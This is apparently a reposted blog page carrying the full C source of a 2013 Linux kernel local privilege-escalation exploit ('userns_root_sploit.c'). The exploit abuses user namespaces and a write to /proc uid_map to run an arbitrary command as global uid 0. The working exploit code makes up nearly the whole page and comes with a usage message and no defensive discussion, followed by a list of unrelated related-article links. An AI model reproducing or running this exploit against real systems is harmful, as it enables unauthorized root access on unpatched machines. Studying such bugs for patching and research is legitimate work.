Linux Kernel open-time Capability file_ns_capable() Privilege Escalation
2013-05-10 10:14
495 查看
/* userns_root_sploit.c by */ /* Copyright (c) 2013 Andrew Lutomirski. All rights reserved. */ /* You may use, modify, and redistribute this code under the GPLv2. */ #define _GNU_SOURCE #include <unistd.h> #include <sched.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/mman.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <err.h> #include <linux/futex.h> #include <errno.h> #include <unistd.h> #include <sys/syscall.h> #ifndef CLONE_NEWUSER #define CLONE_NEWUSER 0x10000000 #endif pid_t parent; int *ftx; int childfn() { int fd; char buf[128]; if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 && errno != EWOULDBLOCK) err(1, "futex"); sprintf(buf, "/proc/%ld/uid_map", (long)parent); fd = open(buf, O_RDWR | O_CLOEXEC); if (fd == -1) err(1, "open %s", buf); if (dup2(fd, 1) != 1) err(1, "dup2"); // Write something like "0 0 1" to stdout with elevated capabilities. execl("./zerozeroone", "./zerozeroone"); return 0; } int main(int argc, char **argv) { int dummy, status; pid_t child; if (argc < 2) { printf("usage: userns_root_sploit COMMAND ARGS...\n\n" "This will run a command as (global) uid 0 but no capabilities.\n"); return 1; } ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (ftx == MAP_FAILED) err(1, "mmap"); parent = getpid(); if (signal(SIGCHLD, SIG_DFL) != 0) err(1, "signal"); child = fork(); if (child == -1) err(1, "fork"); if (child == 0) return childfn(); *ftx = 1; if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0) err(1, "futex"); if (unshare(CLONE_NEWUSER) != 0) err(1, "unshare(CLONE_NEWUSER)"); if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child failed"); if (setresuid(0, 0, 0) != 0) err(1, "setresuid"); execvp(argv[1], argv+1); err(1, argv[1]); return 0; }
相关文章推荐
- Peeking into Linux kernel-land using /proc filesystem for quick’n’dirty troubleshooting
- linux加载共享问题error while loading shared libraries: xxx.so.0:cannot open shared object file: No such fi
- Linux CentOS 7 中find命令、三个Time、快捷键及file判断文件类型
- ARM linux kernel file analysis
- linux下安装vmware Could not open /dev/vmmon: No such file or directory. Please make sure that the kerne
- Access the Linux kernel using the /proc filesystem
- linux操作提示:“Can't open file for writing”或“operation not permitted”的解决办法
- Linux下设置最大文件打开数nofile及nr_open、file-max
- linux 最大文件打开数nofile及nr_open、file-max说明
- Linux下无法启动oracle could not open parameter file 解决方法
- $ ns Error: Cannot open shared library: No such file or directory
- Linux下Shell脚本执行PHP报错:Could not open input file
- Access the Linux kernel using the /proc filesystem
- Qt程序在linux编译出现[file*** has modification time 3.8e+04s in the furure]问题
- linux学习之六---__LINE__&__TIME__&__FUNCTION__&__FILE__
- Linux解决问题篇——ftp上传文件(使用put)时,permission denied,下载文件(使用get)时,failed to open file
- 〖Android〗arm-linux-androideabi-gdb报 libpython2.6.so.1.0: cannot open shared object file错误的解决方法
- Linux中fork系统调用编译出错/usr/bin/ld: cannot open output file fork_test: Is a directory co
- LINUX下写大文件 -D _FILE_OFFSET_BITS=64或者open时加O_LARGEFILE
- Peeking into Linux kernel-land using /proc filesystem for quick’n’dirty troubleshooting